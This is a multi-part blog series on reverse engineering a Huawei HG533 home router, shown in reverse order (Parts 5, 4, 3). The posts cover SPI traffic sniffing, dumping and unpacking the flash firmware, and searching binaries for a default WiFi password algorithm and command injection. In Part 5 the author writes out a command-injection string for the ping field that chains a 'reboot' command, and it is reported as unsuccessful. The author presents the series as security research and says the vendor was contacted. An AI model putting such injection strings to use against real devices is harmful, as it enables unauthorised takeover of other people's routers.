In some cases -mostly when disassembling shared objects- you may see somefunction names or none at all. The ones you WILL see are the Dynamic Symbols in the .dymsym table: We discussed earlier the massive amount of memory that can be saved by using shared objects to keep the pieces of code you need to re-use all over the system (e.g. printf()). In order to locate pieces of data inside the shared object, the caller uses their human-readable name. That means the names for functions and variables that need to be publicly accessible must be left in the binary. The rest of them can be removed, which is why ELF uses 2 symbol tables: .dynsym for publicly accessible symbols and .symtab for the internal ones.

For more details on symbol tables and other intricacies of the ELF format, check out: The ELF Format — How programs look from the insideInside ELF Symbol Tablesand the ELF spec (PDF).

Looking for the Default WiFi Password Generation Algorithm

What do We Know?

Remember the wifi password generation algorithm we discussed in part 3? (The Pot of Gold at the End of the Firmware) I explained then why I didn’t expect this router to have one, but let’s take a look anyway.

If you recall, these are the default WiFi credentials in my router:

Router Sticker - Annotated

So what do we know?

  1. Each device is pre-configured with a different set of WiFi credentials
  2. The credentials could be hardcoded at the factory or generated on the device. Either way, we know from previous posts that both SSID and password are stored in the reserved area of Flash memory, and they’re right next to each other
    • If they were hardcoded at the factory, the router only needs to read them from a known memory location
    • If they are generated in the device and then stored to flash, there must be an algorithm in the router that -given the same inputs- always generates the same outputs. If the inputs are public (e.g. the MAC address) and we can find, reverse and replicate the algorithm, we could calculate default WiFi passwords for any other router that uses the same algorithm

Let’s see what we can do with that…

Finding Hardcoded Strings

Let’s assume there IS such algorithm in the router. Between username and password, there’s only one string that remains constant across devices:TALKTALK-. This string is prepended to the last 6 characters of the MAC address. If the generation algorithm is in the router, surely this string must be hardcoded in there. Let’s look it up:

$ grep -r 'TALKTALK-' .
Binary file ./bin/cms matches
Binary file ./bin/nmbd matches
Binary file ./bin/smbd matches

2 of those 3 binaries (nmbd and smbd) are part of samba, the program used to use the USB flash drive as a network storage device. They’re probably used to identify the router over the network. Let’s take a look at the other one: /bin/cms.

Reversing the Functions that Uses Them


That looks exactly the way we’d expect the SSID generation algorithm to look. The code is located inside a rather large function called ATP_WLAN_Init, and somewhere in there it performs the following actions:

  1. Find out the MAC address of the device we’re running on:
    • mac = BSP_NET_GetBaseMacAddress()
  2. Create the SSID string:
    • snprintf(SSID, "TALKTALK-%02x%02x%02x", mac[3], mac[4], mac[5])
  3. Save the string somewhere:
    • ATP_DBSetPara(SavedRegister3, 0xE8801E09, SSID)

Unfortunately, right after this branch the function simply does an ATP_DBSave and moves on to start running commands and whatnot. e.g.:

ATP_WLAN_Init moves on before you

Further inspection of this function and other references to ATP_DBSave did not reveal anything interesting.

Giving Up

After some time using this process to find potentially relevant pieces of code, reverse them, and analyse them, I didn’t find anything that looked like the password generation algorithm. That would confirm the suspicions I’ve had since we found the default credentials in the protected flash area: The manufacturer used proper security techniques and flashed the credentials at the factory, which is why there is no algorithm. Since the designers manufacture their own hardware, the decision makes perfect sense for this device. They can do whatever they want with their manufacturing lines, so they decided to do it right.

I might take another look at it in the future, or try to find it in some other router (I’d like to document the process of reversing it), but you should know this method DOES work for a lot of products. There’s a long history of freely available default WiFi password generators.

Since we already know how to find relevant code in the filesystem binaries, let’s see what else we can do with that knowledge.

Looking for Command Injection Vulnerabilities

One of the most common, easy to find and dangerous vulnerabilities is command injection. The idea is simple; we find an input string that is gonna be used as an argument for a shell command. We try to append our own commands and get them to execute, bypassing any filters that the developers may have implemented. In embedded devices, such vulnerabilities often result in full root control of the device.

These vulnerabilities are particularly common in embedded devices due to their memory constraints. Say you’re developing the web interface used by the users to configure the device; you want to add the possibility to ping a user-defined server from the router, because it’s very valuable information to debug network problems. You need to give the user the option to define the ping target, and you need to serve them the results:

Router WEB Interface Ping in action

Once you receive the data of which server to target, you have two options: You find a library with the ICMP protocol implemented and call it directly from the web backend, or you could use a single, standard function call and use the router’s already existing ping shell command. The later is easier to implement, saves memory, etc. and it’s the obvious choice. Taking user input (target server address) and using it as part of a shell command is where the danger comes in. Let’s see how this router’s web application, /bin/web, handles it:

/bin/web's ping function

A call to libc’s system() (not to be confused with a system call/syscall) is the easiest way to execute a shell command from an application. Sometimes developers wrap system() in custom functions in order to systematically filter all inputs, but there’s always something the wrapper can’t do or some developer who doesn’t get the memo.

Looking for references to system in a binary is an excellent way to find vectors for command injections. Just investigate the ones that look like may be using unfiltered user input. These are all the references to system() in the /bin/web binary:

xrefs to system in /bin/web

Even the names of the functions can give you clues on whether or not a reference to system() will receive user input. We can also see some references to PIN and PUK codes, SIMs, etc. Seems like this application is also used in some mobile product…

I spent some time trying to find ways around the filtering provided byatp_gethostbyname (anything that isn’t a domain name causes an error), but I couldn’t find anything in this field or any others. Further analysis may prove me wrong. The idea would be to inject something to the effects of this:

Attempt reboot injection on ping field

Which would result in this final string being executed as a shell command: ping -c 1; reboot; ping > /dev/null. If the router reboots, we found a way in.

As I said, I couldn’t find anything. Ideally we’d like to verify that for all input fields, whether they’re in the web interface or some other network interface. Another example of a network interface potentially vulnerable to remote command injections is the “LAN-Side DSL CPE Configuration” protocol, or TR-064. Even though this protocol was designed to be used over the internal network only, it’s been used to configure routers over the internet in the past. Command injection vulnerabilities in some implementations of this protocol have been used to remotely extract data like WiFi credentials from routers with just a few packets.

This router has a binary conveniently named /bin/tr064; if we take a look, we find this right in the main() function:

/bin/tr064 using /etc/serverkey.pem

That’s the private RSA key we found in Part 2 being used for SSL authentication. Now we might be able to supplant a router in the system and look for vulnerabilities in their servers, or we might use it to find other attack vectors. Most importantly, it closes the mistery of the private key we found while scouting the firmware.

Looking for More Complex Vulnerabilities [Theory]

Even if we couldn’t find any command injection vulnerabilities, there are always other vectors to gain control of the router. The most common ones are good old buffer overflows. Any input string into the router, whether it is for a shell command or any other purpose, is handled, modified and passed around the code. An error by the developer calculating expected buffer lengths, not validating them, etc. in those string operations can result in an exploitable buffer overflow, which an attacker can use to gain control of the system.

The idea behind a buffer overflow is rather simple: We manage to pass a string into the system that contains executable code. We override some address in the program so the execution flow jumps into the code we just injected. Now we can do anything that binary could do -in embedded systems like this one, where everything runs as root, it means immediate root pwnage.

Introducing an unexpectedly long input

Developing an exploit for this sort of vulnerability is not as simple as appending commands to find your way around a filter. There are multiple possible scenarios, and different techniques to handle them. Exploits using more involved techniques like ROP can become necessary in some cases. That being said, most household embedded systems nowadays are decades behind personal computers in terms of anti-exploitation techniques. Methods like Address Space Layout Randomization(ASLR), which are designed to make exploit development much more complicated, are usually disabled or not implemented at all.

If you’d like to find a potential vulnerability so you can learn exploit development on your own, you can use the same techniques we’ve been using so far. Find potentially interesting inputs, locate the code that manages them using function names, hardcoded strings, etc. and try to trigger a malfunction sending an unexpected input. If we find an improperly handled string, we might have an exploitable bug.

Once we’ve located the piece of disassembled code we’re going to attack, we’re mostly interested in string manipulation functions like strcpystrcat,sprintf, etc. Their more secure counterparts strncpystrncat, etc. are also potentially vulnerable to some techniques, but usually much more complicated to work with.

Pic of strcpy handling an input

Even though I’m not sure that function -extracted from /bin/tr064— is passed any user inputs, it’s still a good example of the sort of code you should be looking for. Once you find potentially insecure string operations that may handle user input, you need to figure out whether there’s an exploitable bug.

Try to cause a crash by sending unexpectedly long inputs and work from there. Why did it crash? How many characters can I send without causing a crash? Which payload can I fit in there? Where does it land in memory? etc. etc. I may write about this process in more detail at some point, but there’s plenty of literature available online if you’re interested.

Don’t spend all your efforts on the most obvious inputs only -which are also more likely to be properly filtered/handled-; using tools like the burp web proxy (or even the browser itself), we can modify fields like cookies to check for buffer overflows.

Web vulnerabilities like CSRF are also extremely common in embedded devices with web interfaces. Exploiting them to write to files or bypass authentication can lead to absolute control of the router, specially when combined with command injections. An authentication bypass for a router with the web interface available from the Internet could very well expose the network to being remotely man in the middle’d. They’re definitely an important attack vector, even though I’m not gonna go into how to find them.

Decompiling Binaries [Theory]

When you decompile a binary, instead of simply translating Machine Code to Assembly Code, the decompiler uses algorithms to identify functions, loops, branches, etc. and replicate them in a higher level language like C or Python.

That sounds like a brilliant idea for anybody who has been banging their head against some assembly code for a few hours, but an additional layer of abstraction means more potential errors, which can result in massive wastes of time.

In my (admittedly short) personal experience, the output just doesn’t look reliable enough. It might be fine when using expensive decompilers (IDA itself supports a couple of architectures), but I haven’t found one I can trust with MIPS binaries. That being said, if you’d like to give one a try, the RetDec online decompiler supports multiple architectures- including MIPS.

Binary Decompiled to C by RetDec

Even as a ‘high level’ language, the code is not exactly pretty to look at.

Next Steps

Whether we want to learn something about an algorithm we’re reversing, to debug an exploit we’re developing or to find any other sort of vulnerability, being able to execute (and, if possible, debug) the binary on an environment we fully control would be a massive advantage. In some/most cases -like this router-, being able to debug on the original hardware is not possible. In the next post, we’ll work on CPU emulation to debug the binaries in our own computers.

Thanks for reading! I’m sorry this post took so long to come out. Between work, and seeing family/friends, this post was written about 1 paragraph at a time from 4 different countries. Things should slow down for a while, so hopefully I’ll be able to publish Part 6 soon. I’ve also got some other reversing projects coming down the pipeline, starting with hacking the Amazon Echo and a router with JTAG. I’ll try to get to those soon, work permitting… Happy Hacking 🙂

Tips and Tricks

Mistaken xrefs and how to remove them

Sometimes an address is loaded into a register for 16bit/32bit adjustments. The contents of that address have no effect on the rest of the code; it’s just a routinary adjustment. If the address that is assigned to the register happens to be pointing to some valid data, IDA will rename the address in the assembly and display the contents in a comment.

It is up to you to figure out whether an x-ref makes sense or not. If it doesn’t, select the variable and press o in IDA to ignore the contents and give you only the address. This makes the code much less confusing.

Setting function prototypes so IDA comments the args around calls for us

Set the cursor on a function and press y. Set the prototype for the function: e.g. int memcpy(void *restrict dst, const void *restrict src, int n);. Note:IDA only understands built-in types, so we can’t use types like size_t.

Once again we can use the extern declarations found in the GPL source code. When available, find the declaration for a specific function, and use the same types and names for the arguments in IDA.

Taking Advantage of the GPL Source Code

If we wanna figure out what are the 1st and 2nd parameters of a function likeATP_DBSetPara, we can sometimes rely on the GPL source code. Lots of functions are not implemented in the kernel or any other open source component, but they’re still used from one of them. That means we can’t see the code we’re interested in, but we can see the extern declarations for it. Sometimes the source will include documentation comments or descriptive variable names; very useful info that the disassembly doesn’t provide:

ATP_DBSetPara extern declaration in gpl_source/inc/cfmapi.h

Unfortunately, the function documentation comment is not very useful in this case -seems like there were encoding issues with the file at some point, and everything written in Chinese was lost. At least now we know that the first argument is a list of keys, and the second is something they call ParamCMOParamCMO is a constant in our disassembly, so it’s probably just a reference to the key we’re trying to set.

Disassembly Methods — Linear Sweep vs Recursive Descent

The structure of a binary can vary greatly depending on compiler, developers, etc. How functions call each other is not always straightforward for a disassembler to figure out. That means you may run into lots of ‘orphaned’ functions, which exist in the binary but do not have a known caller.

Which disassembler you use will dictate whether you see those functions or not, some of which can be extremely important to us (e.g. the ping function in theweb binary we reversed earlier). This is due to how they scan binaries for content:

  1. Linear Sweep: Read the binary one byte at a time, anything that looks like a function is presented to the user. This requires significant logic to keep false positives to a minimum
  2. Recursive Descent: We know the binary’s entry point. We find all functions called from main(), then we find the functions called from those, and keep recursively displaying functions until we’ve got “all” of them. This method is very robust, but any functions not referenced in a standard/direct way will be left out

Make sure your disassembler supports linear sweep if you feel like you’re missing any data. Make sure the code you’re looking at makes sense if you’re using linear sweep.

Practical Reverse Engineering Part 4 — Dumping the Flash

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

In Parts 1 to 3 we’ve been gathering data within its context. We could sniff the specific pieces of data we were interested in, or observe the resources used by each process. On the other hand, they had some serious limitations; we didn’t have access to ALL the data, and we had to deal with very minimal tools… And what if we had not been able to find a serial port on the PCB? What if we had but it didn’t use default credentials?

In this post we’re gonna get the data straight from the source, sacrificing context in favour of absolute access. We’re gonna dump the data from the Flash IC and decompress it so it’s usable. This method doesn’t require expensive equipment and is independent of everything we’ve done until now. An external Flash IC with a public datasheet is a reverser’s great ally.

Dumping the Memory Contents

As discussed in Part 3, we’ve got access to the datasheet for the Flash IC, so there’s no need to reverse its pinout:

Flash Pic Annotated Pinout

We also have its instruction set, so we can communicate with the IC using almost any device capable of ‘speaking’ SPI.

We also know that powering up the router will cause the Ralink to start communicating with the Flash IC, which would interfere with our own attempts to read the data. We need to stop the communication between the Ralink and the Flash IC, but the best way to do that depends on the design of the circuit we’re working with.

Do We Need to Desolder The Flash IC? [Theory]

The perfect way to avoid interference would be to simply desolder the Flash IC so it’s completely isolated from the rest of the circuit. It gives us absolute control and removes all possible sources of interference. Unfortunately, it also requires additional equipment, experience and time, so let’s see if we can avoid it.

The second option would be to find a way of keeping the Ralink inactive while everything else around it stays in standby. Microcontrollers often have a Reset pin that will force them to shut down when pulled to 0; they’re commonly used to force IC reboots without interrupting power to the board. In this case we don’t have access to the Ralink’s full datasheet (it’s probably distributed only to customers and under NDA); the IC’s form factor and the complexity of the circuit around it make for a very hard pinout to reverse, so let’s keep thinking…

What about powering one IC up but not the other? We can try applying voltage directly to the power pins of the Flash IC instead of powering up the whole circuit. Injecting power into the PCB in a way it wasn’t designed for could blow something up; we could reverse engineer the power circuit, but that’s tedious work. This router is cheap and widely available, so I took the ‘fuck it’ approach. The voltage required, according to the datasheet, is 3V; I’m just gonna apply power directly to the Flash IC and see what happens. It may power up the Ralink too, but it’s worth a try.

Flash Powered UART Connected

We start supplying power while observing the board and waiting for data from the Ralink’s UART port. We can see some LEDs light up at the back of the PCB, but there’s no data coming out of the UART port; the Ralink must not be running. Even though the Ralink is off, its connection to the Flash IC may still interfere with our traffic because of multiple design factors in both power circuit and the silicon. It’s important to keep that possibility in mind in case we see anything dodgy later on; if that was to happen we’d have to desolder the Flash IC (or just its data pins) to physically disconnect it from everything else.

The LEDs and other static components can’t communicate with the Flash IC, so they won’t be an issue as long as we can supply enough current for all of them. I’m just gonna use a bench power supply, with plenty of current available for everything. If you don’t have one you can try using the Master’s power lines, or some USB power adapter if you need some more current. They’ll probably do just fine.

Time to connect our SPI Master.

Connecting to the Flash IC

Now that we’ve confirmed there’s no need to desolder the Ralink we can connect any device that speaks SPI and start reading memory contents block by block. Any microcontroller will do, but a purpose-specific SPI-USB bridge will often be much faster. In this case I’m gonna be using a board based on the FT232H, which supports SPI among some other low level protocols.

We’ve got the pinout for both the Flash and my USB-SPI bridge, so let’s get everything connected.

Shikra and Power Connected to Flash

Now that the hardware is ready it’s time to start pumping data out.

Dumping the Data

We need some software in our computer that can understand the USB-SPI bridge’s traffic and replicate the memory contents as a binary file. Writing our own wouldn’t be difficult, but there are programs out there that already support lots of common Masters and Flash ICs. Let’s try the widely known and open source flashrom.

flashrom is old and buggy, but it already supports both the FT232H as Master and the FL064PIF as Slave. It gave me lots of trouble in both OSX and an Ubuntu VM, but ended up working just fine on a Raspberry Pi (Raspbian):

flashrom stdout

Success! We’ve got our memory dump, so we can ditch the hardware and start preparing the data for analysis.

Splitting the Binary

The file command has been able to identify some data about the binary, but that’s just because it starts with a header in a supported format. In a 0-knowledge scenario we’d use binwalk to take a first look at the binary file and find the data we’d like to extract.

Binwalk is a very useful tool for binary analysis created by the awesome hackers at /dev/ttyS0; you’ll certainly get to know them if you’re into hardware hacking.

binwalk spidump.bin

In this case we’re not in a 0-knowledge scenario; we’ve been gathering data since day 1, and we obtained a complete memory map of the Flash IC in Part 2. The addresses mentioned in the debug message are confirmed by binwalk, and it makes for much cleaner splitting of the binary, so let’s use it:

Flash Memory Map From Part 2

With the binary and the relevant addresses, it’s time to split the binary into its 4 basic segments. dd takes its parameters in terms of block size (bs, bytes), offset (skip, blocks) and size (count, blocks); all of them in decimal. We can use a calculator or let the shell do the hex do decimal conversions with $(()):

$ dd if=spidump.bin of=bootloader.bin bs=1 count=$((0x020000))
    131072+0 records in
    131072+0 records out
    131072 bytes transferred in 0.215768 secs (607467 bytes/sec)
$ dd if=spidump.bin of=mainkernel.bin bs=1 count=$((0x13D000-0x020000)) skip=$((0x020000))
    1167360+0 records in
    1167360+0 records out
    1167360 bytes transferred in 1.900925 secs (614101 bytes/sec)
$ dd if=spidump.bin of=mainrootfs.bin bs=1 count=$((0x660000-0x13D000)) skip=$((0x13D000))
    5386240+0 records in
    5386240+0 records out
    5386240 bytes transferred in 9.163635 secs (587784 bytes/sec)
$ dd if=spidump.bin of=protect.bin bs=1 count=$((0x800000-0x660000)) skip=$((0x660000))
    1703936+0 records in
    1703936+0 records out
    1703936 bytes transferred in 2.743594 secs (621060 bytes/sec)

We have created 4 different binary files:

  1. bootloader.bin: U-boot. The bootloader. It’s not compressed because the Ralink wouldn’t know how to decompress it.
  2. mainkernel.bin: Linux Kernel. The basic firmware in charge of controlling the bare metal. Compressed using lzma
  3. mainrootfs.bin: Filesystem. Contains all sorts of important binaries and configuration files. Compressed as squashfs using the lzma algorithm
  4. protect.bin: Miscellaneous data as explained in Part 3. Not compressed

Extracting the Data

Now that we’ve split the binary into its 4 basic segments, let’s take a closer look at each of them.


binwalk bootloader.bin

Binwalk found the uImage header and decoded it for us. U-Boot uses these headers to identify relevant memory areas. It’s the same info that the file command displayed when we fed it the whole memory dump because it’s the first header in the file.

We don’t care much for the bootloader’s contents in this case, so let’s ignore it.


binwalk mainkernel.bin

Compression is something we have to deal with before we can make any use of the data. binwalk has confirmed what we discovered in Part 2, the kernel is compressed using lzma, a very popular compression algorithm in embedded systems. A quick check with strings mainkernel.bin | less confirms there’s no human readable data in the binary, as expected.

There are multiple tools that can decompress lzma, such as 7z or xz. None of those liked mainkernel.bin:

$ xz --decompress mainkernel.bin
xz: mainkernel.bin: File format not recognized

The uImage header is probably messing with tools, so we’re gonna have to strip it out. We know the lzma data starts at byte 0x40, so let’s copy everything but the first 64 bytes.

dd if=mainkernel of=noheader

And when we try to decompress…

$ xz --decompress mainkernel_noheader.lzma
xz: mainkernel_noheader.lzma: Compressed data is corrupt

xz has been able to recognize the file as lzma, but now it doesn’t like the data itself. We’re trying to decompress the whole mainkernel Flash area, but the stored data is extremely unlikely to be occupying 100% of the memory segment. Let’s remove any unused memory from the tail of the binary and try again:

Cut off the tail; decompression success

xz seems to have decompressed the data successfully. We can easily verify that using the strings command, which finds ASCII strings in binary files. Since we’re at it, we may as well look for something useful…

strings kernel grep key

The Wi-Fi Easy and Secure Key Derivation string looks promising, but as it turns out it’s just a hardcoded string defined by the Wi-Fi Protected Setup spec. Nothing to do with the password generation algorithm we’re interested in.

We’ve proven the data has been properly decompressed, so let’s keep moving.


binwalk mainrootfs.bin

The mainrootfs memory segment does not have a uImage header because it’s relevant to the kernel but not to U-Boot.

SquashFS is a very common filesystem in embedded systems. There are multiple versions and variations, and manufacturers sometimes use custom signatures to make the data harder to locate inside the binary. We may have to fiddle with multiple versions of unsquashfs and/or modify the signatures, so let me show you what the signature looks like in this case:

sqsh signature in hexdump

Since the filesystem is very common and finding the right configuration is tedious work, somebody may have already written a script to automate the task. I came across this OSX-specific fork of the Firmware Modification Kit, which compiles multiple versions of unsquashfs and includes a neat script called to run all of them. It’s worth a try. mainrootfs.bin

Wasn’t that easy? We got lucky with the SquashFS version and supported signature, and managed to decompress the filesystem. Now we’ve got every binary in the filesystem, every symlink and configuration file, and everything is nice and tidy:

tree unsquashed_filesystem

In the complete file tree we can see we’ve got every file in the system, (other than runtime files like those in /var/, of course).

Using the intel we have been gathering on the firmware since day 1 we can start looking for potentially interesting binaries:

grep -i -r '$INTEL' squashfs-root

If we were looking for network/application vulnerabilities in the router, having every binary and config file in the system would be massively useful.


binwalk protect.bin

As we discussed in Part 3, this memory area is not compressed and contains all pieces of data that need to survive across reboots but be different across devices. strings seems like an appropriate tool for a quick overview of the data:

strings protect.bin

Everything in there seems to be just the curcfg.xml contents, some logs and those few isolated strings in the picture. We already sniffed and analysed all of that data in Part 3, so there’s nothing else to discuss here.

Next Steps

At this point all hardware reversing for the Ralink is complete and we’ve collected everything there was to collect in ROM. Just think of what you may be interested in and there has to be a way to find it. Imagine we wanted to control the router through the UART debug port we found in Part 1, but when we try to access the ATP CLI we can’t figure out the credentials. After dumping the external Flash we’d be able to find the XML file in the protect area, and discover the credentials just like we did in Part 2 (The Rambo Approach to Intel Gatheringadmin:admin).

If you couldn’t dump the memory IC for any reason, the firmware upgrade files provided by the manufacturers will sometimes be complete memory segments; the device simply overwrites the relevant flash areas using code previously loaded to RAM. Downloading the file from the manufacturer would be the equivalent of dumping those segments from flash, so we just need to decompress them. They won’t have all the data, but it may be enough for your purposes.

Now that we’ve got the firmware we just need to think of anything we may be interested in and start looking for it through the data. In the next post we’ll dig a bit into different binaries and try to find more potentially useful data.

Practical Reverse Engineering Part 3 — Following the Data

Projects and learnt lessons on Systems Security, Embedded Development, IoT and anything worth writing about

  • Part 1: Hunting for Debug Ports
  • Part 2: Scouting the Firmware
  • Part 3: Following the Data
  • Part 4: Dumping the Flash
  • Part 5: Digging Through the Firmware

The best thing about hardware hacking is having full access to very bare metal, and all the electrical signals that make the system work. With ingenuity and access to the right equipment we should be able to obtain any data we want. From simply sniffing traffic with a cheap logic analyser to using thousands of dollars worth of equipment to obtain private keys by measuring the power consumed by the device with enough precision (power analysis side channel attack); if the physics make sense, it’s likely to work given the right circumstances.

In this post I’d like to discuss traffic sniffing and how we can use it to gather intel.

Traffic sniffing at a practical level is used all the time for all sorts of purposes, from regular debugging during the delopment process to reversing the interface of gaming controllers, etc. It’s definitely worth a post of its own, even though this device can be reversed without it.

Please check out the legal disclaimer in case I come across anything sensitive.

Full disclosure: I’m in contact with Huawei’s security team. I tried to contact TalkTalk, but their security staff is nowhere to be seen.

Data Flows In the PCB

Data is useless within its static memory cells, it needs to be read, written and passed around in order to be useful. A quick look at the board is enough to deduce where the data is flowing through, based on IC placement and PCB traces:

PCB With Data Flows and Some IC Names

We’re not looking for hardware backdoors or anything buried too deep, so we’re only gonna look into the SPI data flowing between the Ralink and its external Flash.

Pretty much every IC in the market has a datasheet documenting all its technical characteristics, from pinouts to power usage and communication protocols. There are tons of public datasheets on google, so find the ones relevant to the traffic you want to sniff:

Now we’ve got pinouts, electrical characteristics, protocol details… Let’s take a first look and extract the most relevant pieces of data.

Understanding the Flash IC

We know which data flow we’re interested: The SPI traffic between the Ralink IC and Flash. Let’s get started; the first thing we need is to figure out how to connect the logic analyser. In this case we’ve got the datasheet for the Flash IC, so there’s no need to reverse engineer any pinouts:

Flash Pic Annotated Pinout

Standard SPI communication uses 4 pins:

  1. MISO (Master In Slave Out): Data line Ralink<-Flash
  2. MOSI (Master Out Slave In): Data line Ralink->Flash
  3. SCK (Clock Signal): Coordinates when to read the data lines
  4. CS# (Chip Select): Enables the Flash IC when set to 0 so multiple of them can share MISO/MOSI/SCK lines.

We know the pinout, so let’s just connect a logic analyser to those 4 pins and capture some random transmission:

Connected Logic Analyser

In order to set up our logic analyser we need to find out some SPI configuation options, specifically:

  • Transmission endianness [Standard: MSB First]
  • Number of bits per transfer [Standard: 8]. Will be obvious in the capture
  • CPOL: Default state of the clock line while inactive [0 or 1]. Will be obvious in the capture
  • CPHA: Clock edge that triggers the data read in the data lines [0=leading, 1=trailing]. We’ll have to deduce this

The datasheet explains that the flash IC understands only 2 combinations of CPOL and CPHA: (CPOL=0, CPHA=0) or (CPOL=1, CPHA=1)

Datasheet SPI Settings

Let’s take a first look at some sniffed data:

Logic Screencap With CPOL/CPHA Annotated

In order to understand exactly what’s happenning you’ll need the FL064PIF’s instruction set, available in its datasheet:

FL064PIF Instruction Set

Now we can finally analyse the captured data:

Logic Sample SPI Packet

In the datasheet we can see that the FL064PIF has high-performance features for read and write operations: Dual and Quad options that multiplex the data over more lines to increase the transmission speed. From taking a few samples, it doesn’t seem like the router uses these features much -if at all-, but it’s important to keep the possibility in mind in case we see something odd in a capture.

Transmission modes that require additional pins can be a problem if your logic analyser is not powerful enough.

The Importance of Your Sampling Rate [Theory]

A logic analyser is a conceptually simple device: It reads signal lines as digital inputs every x microseconds for y seconds, and when it’s done it sends the data to your computer to be analysed.

For the protocol analyser to generate accurate data it’s vital that we record digital inputs faster than the device writes them. Otherwise the data will be mangled by missing bits or deformed waveforms.

Unfortunately, your logic analyser’s maximum sampling rate depends on how powerful/expensive it is and how many lines you need to sniff at a time. High-speed interfaces with multiple data lines can be a problem if you don’t have access to expensive equipment.

I recorded this data from the Ralink-Flash SPI bus using a low-end Saleae analyser at its maximum sampling rate for this number of lines, 24 MS/s:

Picture of Deformed Clock Signal

As you can see, even though the clock signal has the 8 low to high transitions required for each byte, the waveform is deformed.

Since the clock signal is used to coordinate when to read the data lines, this kind of waveform deformation may cause data corruption even if we don’t drop any bits (depending partly on the design of your logic analyser). There’s always some wiggle room for read inaccuracies, and we don’t need 100% correct data at this point, but it’s important to keep all error vectors in mind.

Let’s sniff the same bus using a higher performance logic analyser at 100 MS/s:

High Sampling Rate SPI Sample Reading

As you can see, this clock signal is perfectly regular when our Sampling Rate is high enough.

If you see anything dodgy in your traffic capture, consider how much data you’re willing to lose and whether you’re being limited by your equipment. If that’s the case, either skip this Reversing vector or consider investing in a better logic analyser.

Seeing the Data Flow

We’re already familiar with the system thanks to the overview of the firmware we did in Part 2, so we can think of some specific SPI transmissions that we may be interested in sniffing. Simply connecting an oscilloscope to the MISO and MOSI pins will help us figure out how to trigger those transmissions and yield some other useful data.

Scope and UART Connected

Here’s a video (no audio) showing both the serial interface and the MISO/MOSI signals while we manipulate the router:

This is a great way of easily identifying processes or actions that trigger flash read/write actions, and will help us find out when to start recording with the logic analyser and for how long.

Analysing SPI Traffic — ATP’s Save Command

In Post 2 I mentioned ATP CLI has a save command that stores something to flash; unfortunately, the help menu (save ?) won’t tell you what it’s doing and the only output when you run it is a few dots that act as a progress bar. Why don’t we find out by ourselves? Let’s make a plan:

  1. Wait until boot sequence is complete and the router is idle so there’s no unexpected SPI traffic
  2. Start the ATP Cli as explained in Part 1
  3. Connect the oscilloscope to MISO/MOSI and run save to get a rough estimate of how much time we need to capture data for
  4. Set a trigger in the enable line sniffed by the logic analyser so it starts recording as soon as the flash IC is selected
  5. Run save
  6. Analyse the captured data

Steps 3 and 4 can be combined so you see the data flow in real time in the scopewhile you see the charge bar for the logic analyser; that way you can make sure you don’t miss any data. In order to comfortably connect both scope and logic sniffer to the same pins, these test clips come in very handy:

SOIC16 Test Clip Connected to Flash IC

Once we’ve got the traffic we can take a first look at it:

Analysing Save Capture on Logic

Let’s consider what sort of data could be extracted from this traffic dump that might be useful to us. We’re working with a memory storage IC, so we can see the data that is being read/written and the addresses where it belongs. I think we can represent that data in a useful way by 2 means:

  1. Traffic map depicting which Flash areas are being written, read or erased in chronological order
  2. Create binary files that replicate the memory blocks that were read/written, preferably removing all the protocol rubbish that we sniffed along with them.

Saleae’s SPI analyser will export the data as a CSV file. Ideally we’d improve their protocol analyser to add the functionality we want, but that would be too much work for this project. One of the great things about low level protocols like SPI is that they’re usually very straightforward; I decided to write some python spaghetti code to analyse the CSV file and extract the data we’re looking for:

The workflow to analyse a capture is the following:

  1. Export sniffed traffic as CSV
  2. Run the script:
    • Iterate through the CSV file
    • Identify different commands by their index
    • Recognise the command expressed by the first byte
    • Process its arguments (addresses, etc.)
    • Identify the read/write payload
    • Convert ASCII representation of each payload byte to binary
    • Write binary blocks to different files for MISO (read) and MOSI (write)
  3. Read the traffic map (regular text) and the binaries (hexdump -C output.bin | less)

The scripts generate these results:

The traffic map is much more useful when combined with the Flash memory map we found in Part 2:

Flash Memory Map From Part 2

From the traffic map we can see the bulk of the save command’s traffic is simple:

  1. Read about 64kB of data from the protect area
  2. Overwrite the data we just read

In the MISO binary we can see most of the read data was just tons of 1s:

Picture MISO Hexdump 0xff

Most of the data in the MOSI binary is plaintext XML, and it looks exactly like the /var/curcfg.xml file we discovered in Part 2. As we discussed then, this “current configuration” file contains tons of useful data, including the current WiFi credentials.

It’s standard to keep reserved areas in flash; they’re mostly for miscellaneous data that needs to survive across reboots and be configurable by user, firmware or factory. It makes sense for a command called save to write data to such area, it explains why the data is perfectly readable as opposed to being compressed like the filesystem, and why we found the XML file in the /var/ folder of the filesystem (it’s a folder for runtime files; data in the protect area has to be loaded to memory separately from the filesystem).

The Pot of Gold at the End of the Firmware [Theory]

During this whole process it’s useful to have some sort of target to keep you digging in the same general direction.

Our target is an old one: the algorithm that generates the router’s default WiFi password. If we get our hands on such algorithm and it happens to derive the password from public information, any HG533 in the world with default WiFi credentials would probably be vulnerable.

That exact security issue has been found countless times in the past, usually deriving the password from public data like the Access Point’s MAC address or its SSID.

That being said, not all routers are vulnerable, and I personally don’t expect this one to be. The main reason behind targeting this specific vector is that it’s caused by a recurrent problem in embedded engineering: The need for a piece of data that is known by the firmware, unique to each device and known by an external entity. From default WiFi passwords to device credentials for IoT devices, this problem manifests in different ways all over the Industry.

Future posts will probably reference the different possibilities I’m about to explain, so let me get all that theory out of the way now.

The Sticker Problem

In this day and era, connecting to your router via ethernet so there’s no need for default WiFi credentials is not an option, using a display to show a randomly generated password would be too expensive, etc. etc. etc. The most widely adopted solution for routers is to create a WiFi network using default credentials, print those credentials on a sticker at the factory and stick it to the back of the device.

Router Sticker - Annotated

The WiFi password is the ‘unique piece of data’, and the computer printing the stickers in the factory is the ‘external entity’. Both the firmware and the computer need to know the default WiFi credentials, so the engineer needs to decide how to coordinate them. Usually there are 2 options available:

  1. The same algorithm is implemented in both the device and the computer, and its input parameters are known to both of them
  2. A computer generates the credentials for each device and they’re stored into each device separately

Developer incompetence aside, the first approach is usually taken as a last resort; if you can’t get your hardware manufacturer to flash unique data to each device or can’t afford the increase in manufacturing cost.

The second approach is much better by design: We’re not trusting the hardware with data sensitive enough to compromise every other device in the field. That being said, the company may still decide to use an algorithm with predictable outputs instead of completely random data; that would make the system as secure as the weakest link between the algorithm -mathematically speaking-, the confidentiality of their source code and the security of the computers/network running it.

Sniffing Factory Reset

